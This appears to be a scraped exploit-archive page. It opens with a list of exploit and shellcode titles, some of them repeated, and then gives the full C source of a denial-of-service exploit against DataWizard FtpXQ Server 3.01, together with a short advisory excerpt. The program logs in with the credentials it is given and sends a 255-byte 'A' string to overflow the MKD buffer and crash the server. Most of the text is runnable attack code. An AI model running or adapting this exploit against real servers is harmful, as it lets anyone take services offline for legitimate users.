
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
121 lines
No EOL
4.5 KiB
C
121 lines
No EOL
4.5 KiB
C
// source: https://www.securityfocus.com/bid/20721/info
|
|
|
|
DataWizard FtpXQ Server is prone to multiple remote vulnerabilities:
|
|
|
|
- A remote denial-of-service issue occurs because the application fails to perform adequate bounds checks on user-supplied data before copying it to an insufficiently sized buffer. An attacker could exploit this issue to crash the application, denying access to legitimate users.
|
|
|
|
- The application creates two testing accounts by default. An attacker can access these accounts to gain read/write privileges on the server, which could result in the compromise of the affected computer.
|
|
|
|
FtpXQ Server 3.01 is vulnerable; other version may also be affected.
|
|
|
|
/*
|
|
* 0xf_ftpxq.c - FTPXQ Denial of service exploit.
|
|
* Federico Fazzi <federicoautistici.org>
|
|
*
|
|
* advisory by Eric Sesterhenn.
|
|
* -- Server built using the WinsockQ from DataWizard Technologies. A
|
|
security
|
|
* -- vulnerability in the product allows remote attackers to overflow an
|
|
* -- internal buffer by providing an overly long "make directory" request.
|
|
*
|
|
* r20061025.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <string.h>
|
|
#include <netdb.h>
|
|
#include <arpa/inet.h>
|
|
#include <sys/types.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/socket.h>
|
|
|
|
// AAAAAAAAAAAAAAAA..AA*255 in hex format.
|
|
char bof[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
"\x41\x41\x41\x41\x41\x41\x41\x41";
|
|
|
|
int main(int argc, char **argv) {
|
|
int sd;
|
|
socklen_t len;
|
|
struct sockaddr_in saddr;
|
|
struct hostent *he;
|
|
char buf[512], tmpbuf[128];
|
|
|
|
if(argc != 5) {
|
|
printf("FTPXQ Server - Denial of service exploit.\n"
|
|
"Federico Fazzi <federicoautistici.org>\n\n"
|
|
"usage: %s <hostname> <port> <user> <password>\n", argv[0]);
|
|
exit(1);
|
|
}
|
|
|
|
if((he = gethostbyname(argv[1])) == NULL) {
|
|
perror("gethostbyname()");
|
|
exit(1);
|
|
}
|
|
|
|
// init socket
|
|
if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
|
|
perror("socket()");
|
|
exit(1);
|
|
}
|
|
|
|
// setup struct
|
|
bzero((char *) &saddr, sizeof(saddr));
|
|
saddr.sin_family = AF_INET;
|
|
bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length);
|
|
saddr.sin_port = htons(atoi(argv[2]));
|
|
|
|
len = sizeof(struct sockaddr);
|
|
// init connection
|
|
if(connect(sd, (struct sockaddr *)&saddr, len) == -1) {
|
|
perror("connect()");
|
|
exit(1);
|
|
}
|
|
printf("FTPXQ Server - Denial of service exploit.\n"
|
|
"Federico Fazzi <federicoautistici.org>\n"
|
|
"---------------------------------------\n");
|
|
puts("connecting..\t\t done");
|
|
|
|
// sending a USER data to daemon
|
|
sprintf(buf, "USER %s\r\n", argv[3]);
|
|
write(sd, buf, strlen(buf));
|
|
puts("sending USER data..\t done");
|
|
|
|
// sending a PASS data to daemon
|
|
sprintf(buf, "PASS %s\r\n", argv[4]);
|
|
write(sd, buf, strlen(buf));
|
|
puts("sending PASS data..\t done");
|
|
|
|
// sending a BOF string with MKD command to host
|
|
sprintf(buf, "MKD %s", bof);
|
|
write(sd, bof, strlen(bof));
|
|
puts("sending MKD bof string.. done");
|
|
|
|
// now checking if server i down
|
|
if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0)
|
|
puts("[!] server doesn't vulnerable");
|
|
else
|
|
puts("[+] server getting down.. done");
|
|
close(sd);
|
|
|
|
return(0);
|
|
} |